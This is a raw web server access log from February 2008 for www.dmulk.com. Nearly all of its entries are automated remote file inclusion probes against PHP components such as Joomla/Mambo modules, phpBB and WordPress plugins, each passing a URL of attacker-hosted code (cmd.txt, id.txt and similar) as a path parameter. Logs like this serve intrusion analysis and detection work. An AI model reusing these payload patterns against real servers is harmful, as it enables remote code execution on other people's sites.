85.234.133.173 - - [21/Feb/2008:04:00:16 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.riothost.com/billing/downloads/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.11.181 - - [21/Feb/2008:04:00:56 -0800] "GET /logs/access.log/index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [21/Feb/2008:04:00:56 -0800] "GET /logs/index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.25.120.246 - - [21/Feb/2008:04:01:36 -0800] "GET /logs/access_071212.log//login.php?dir=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.208.78.80 - - [21/Feb/2008:04:02:19 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ehlcc.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
88.208.78.80 - - [21/Feb/2008:04:02:19 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ehlcc.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
81.25.120.246 - - [21/Feb/2008:04:02:35 -0800] "GET /logs/access_080118.log//login.php?dir=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:04:02:40 -0800] "GET /logs/access_080117.log//login.php?dir=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:04:02:40 -0800] "GET //login.php?dir=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:04:02:40 -0800] "GET /logs//login.php?dir=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:04:02:43 -0800] "GET /logs/access_080211.log//login.php?dir=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.27.58 - - [21/Feb/2008:04:03:17 -0800] "GET /logs/access_080131.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.146.33.210 - - [21/Feb/2008:04:03:44 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
82.146.33.210 - - [21/Feb/2008:04:03:45 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
74.6.8.120 - - [21/Feb/2008:04:03:54 -0800] "GET /plans/A3_ROOF_PLAN.pdf HTTP/1.0" 200 875475 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.25.120.246 - - [21/Feb/2008:04:03:57 -0800] "GET /logs/access.log//login.php?dir=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [21/Feb/2008:04:04:05 -0800] "GET /logs/access_080123.log/modules/TotalCalendar/about.php?inc_dir=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.25.120.246 - - [21/Feb/2008:04:04:21 -0800] "GET /logs/access_080117.log//login.php?dir=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.25.120.246 - - [21/Feb/2008:04:04:34 -0800] "GET /logs/access_080126.log//login.php?dir=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.233.19.105 - - [21/Feb/2008:04:05:19 -0800] "GET /logs////////?mosConfig_absolute_path=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 200 36290 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
211.233.19.105 - - [21/Feb/2008:04:05:19 -0800] "GET ////////?mosConfig_absolute_path=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 200 2968 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
219.136.250.22 - - [21/Feb/2008:04:05:55 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.27.10.226 - - [21/Feb/2008:04:07:27 -0800] "GET /index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://www.supriatna.name/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
64.27.10.226 - - [21/Feb/2008:04:07:27 -0800] "GET /logs/index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://www.supriatna.name/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
81.25.120.246 - - [21/Feb/2008:04:08:10 -0800] "GET /logs/access_071230.log//login.php?dir=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.27.10.226 - - [21/Feb/2008:04:08:13 -0800] "GET /index2.php?admin.php?include_path=%20admin.phphttp://www.supriatna.name/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
64.27.10.226 - - [21/Feb/2008:04:08:13 -0800] "GET /logs/index2.php?admin.php?include_path=%20admin.phphttp://www.supriatna.name/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
87.230.11.181 - - [21/Feb/2008:04:08:37 -0800] "GET /logs/access_080120.log/index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.25.120.246 - - [21/Feb/2008:04:08:53 -0800] "GET /logs/access_071219.log//login.php?dir=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.104.114 - - [21/Feb/2008:04:08:53 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://webcal.promocall.de//tools/pr.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
87.118.104.114 - - [21/Feb/2008:04:08:53 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://webcal.promocall.de//tools/pr.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
213.203.223.115 - - [21/Feb/2008:04:09:00 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.125 - - [21/Feb/2008:04:09:09 -0800] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.heudorf.info/images/stories/Image/allgemein/news/.htaccess/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.125 - - [21/Feb/2008:04:09:09 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.heudorf.info/images/stories/Image/allgemein/news/.htaccess/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.125 - - [21/Feb/2008:04:09:10 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.heudorf.info/images/stories/Image/allgemein/news/.htaccess/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.71 - - [21/Feb/2008:04:09:50 -0800] "GET /mobileoffice/?N=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.79.75.195 - - [21/Feb/2008:04:10:24 -0800] "GET /logs/access.log/index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [21/Feb/2008:04:10:25 -0800] "GET /logs/index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.64.18 - - [21/Feb/2008:04:10:56 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
202.60.64.18 - - [21/Feb/2008:04:10:56 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
91.121.111.157 - - [21/Feb/2008:04:12:03 -0800] "GET /logs/access_080131.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.27.10.226 - - [21/Feb/2008:04:12:10 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.supriatna.name/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
64.27.10.226 - - [21/Feb/2008:04:12:10 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.supriatna.name/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
206.225.90.91 - - [21/Feb/2008:04:12:35 -0800] "GET /logs/access_080118.log//amember//plugins/payment/secpay.inc.php/payment=http://www.jukensei.com/arskobo/modules/mailbbs/imgs/sikud.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.151.23.213 - - [21/Feb/2008:04:13:58 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.motorsport-arts.de/mambots/editors/%20%20%20%20%20%20%20/test.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
62.151.23.213 - - [21/Feb/2008:04:13:58 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.motorsport-arts.de/mambots/editors/%20%20%20%20%20%20%20/test.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
85.234.133.173 - - [21/Feb/2008:04:14:17 -0800] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.riothost.com/billing/downloads/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.133.173 - - [21/Feb/2008:04:14:18 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.riothost.com/billing/downloads/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.21.65 - - [21/Feb/2008:04:15:11 -0800] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.cooldisplays.net/php/save_file/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:04:15:11 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:04:15:11 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
80.67.21.65 - - [21/Feb/2008:04:15:11 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.cooldisplays.net/php/save_file/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.21.65 - - [21/Feb/2008:04:15:11 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.cooldisplays.net/php/save_file/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.76.29 - - [21/Feb/2008:04:15:53 -0800] "GET /logs/access.log/index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [21/Feb/2008:04:15:53 -0800] "GET /logs/index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.89.74.40 - - [21/Feb/2008:04:15:57 -0800] "GET /logs/access_080131.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.151.23.213 - - [21/Feb/2008:04:16:58 -0800] "GET /logs/index.php?oldal=http://www.motorsport-arts.de/mambots/editors/%20%20%20%20%20%20%20/test.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
62.151.23.213 - - [21/Feb/2008:04:16:58 -0800] "GET /index.php?oldal=http://www.motorsport-arts.de/mambots/editors/%20%20%20%20%20%20%20/test.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
64.27.10.226 - - [21/Feb/2008:04:17:06 -0800] "GET /menu.php?admin.php?include_path=%20admin.phphttp://www.supriatna.name/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
64.27.10.226 - - [21/Feb/2008:04:17:06 -0800] "GET /logs/menu.php?admin.php?include_path=%20admin.phphttp://www.supriatna.name/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
194.79.75.195 - - [21/Feb/2008:04:18:23 -0800] "GET /logs/access_080120.log/index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:04:19:34 -0800] "GET /m2f/m2f_phpbb204.php?m2f_root_path=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:04:19:34 -0800] "GET /logs/m2f/m2f_phpbb204.php?m2f_root_path=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:04:19:50 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:04:19:51 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:04:19:54 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:04:19:54 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
62.151.23.213 - - [21/Feb/2008:04:20:10 -0800] "GET /index.php?pag=http://www.motorsport-arts.de/mambots/editors/%20%20%20%20%20%20%20/test.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
62.151.23.213 - - [21/Feb/2008:04:20:14 -0800] "GET /logs/index.php?pag=http://www.motorsport-arts.de/mambots/editors/%20%20%20%20%20%20%20/test.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
205.234.130.198 - - [21/Feb/2008:04:20:48 -0800] "GET /logs/access_080211.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [21/Feb/2008:04:20:49 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [21/Feb/2008:04:20:49 -0800] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [21/Feb/2008:04:21:04 -0800] "GET /logs/access_080122.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [21/Feb/2008:04:21:04 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [21/Feb/2008:04:21:04 -0800] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.48.89 - - [21/Feb/2008:04:21:09 -0800] "GET /logs/access_080211.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.48.89 - - [21/Feb/2008:04:21:10 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.48.89 - - [21/Feb/2008:04:21:10 -0800] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.76.29 - - [21/Feb/2008:04:21:26 -0800] "GET /logs/access_080120.log/index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.48.89 - - [21/Feb/2008:04:21:29 -0800] "GET /logs/access_080122.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.48.89 - - [21/Feb/2008:04:21:29 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.48.89 - - [21/Feb/2008:04:21:29 -0800] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:04:22:35 -0800] "GET /logs/access_080117.log//login.php?dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:04:22:35 -0800] "GET //login.php?dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:04:22:36 -0800] "GET /logs//login.php?dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.130.198 - - [21/Feb/2008:04:22:44 -0800] "GET /logs/access_080211.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:04:22:45 -0800] "GET /logs/access_080211.log//login.php?dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.25.73 - - [21/Feb/2008:04:22:55 -0800] "GET /plans/ HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.172.48.89 - - [21/Feb/2008:04:23:18 -0800] "GET /logs/access_080211.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.99.250 - - [21/Feb/2008:04:23:47 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.91 - - [21/Feb/2008:04:24:16 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.151.23.213 - - [21/Feb/2008:04:24:45 -0800] "GET /solpot.html?body=http://www.motorsport-arts.de/mambots/editors/%20%20%20%20%20%20%20/test.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
62.151.23.213 - - [21/Feb/2008:04:24:45 -0800] "GET /logs/solpot.html?body=http://www.motorsport-arts.de/mambots/editors/%20%20%20%20%20%20%20/test.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
213.203.223.115 - - [21/Feb/2008:04:24:46 -0800] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.115 - - [21/Feb/2008:04:24:46 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.225.90.91 - - [21/Feb/2008:04:24:58 -0800] "GET /logs/access_080118.log//amember//plugins/payment/secpay.inc.php/payment=http://www.jukensei.com/arskobo/modules/mailbbs/imgs/sikud.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.99.250 - - [21/Feb/2008:04:25:47 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.xjehl.com/nasa/scripts/red.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.99.250 - - [21/Feb/2008:04:25:48 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.xjehl.com/nasa/scripts/red.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.99.250 - - [21/Feb/2008:04:25:48 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.xjehl.com/nasa/scripts/red.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.223.115 - - [21/Feb/2008:04:26:21 -0800] "GET /logs/access_080131.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [21/Feb/2008:04:26:46 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://www.riothost.com/billing/downloads/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:04:27:46 -0800] "GET //login.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.45.244.210 - - [21/Feb/2008:04:27:55 -0800] "GET /logs/access_080118.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://preciousland.co.uk/templates/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.244.210 - - [21/Feb/2008:04:27:55 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://preciousland.co.uk/templates/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.244.210 - - [21/Feb/2008:04:27:56 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://preciousland.co.uk/templates/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:28:06 -0800] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:28:07 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:28:13 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
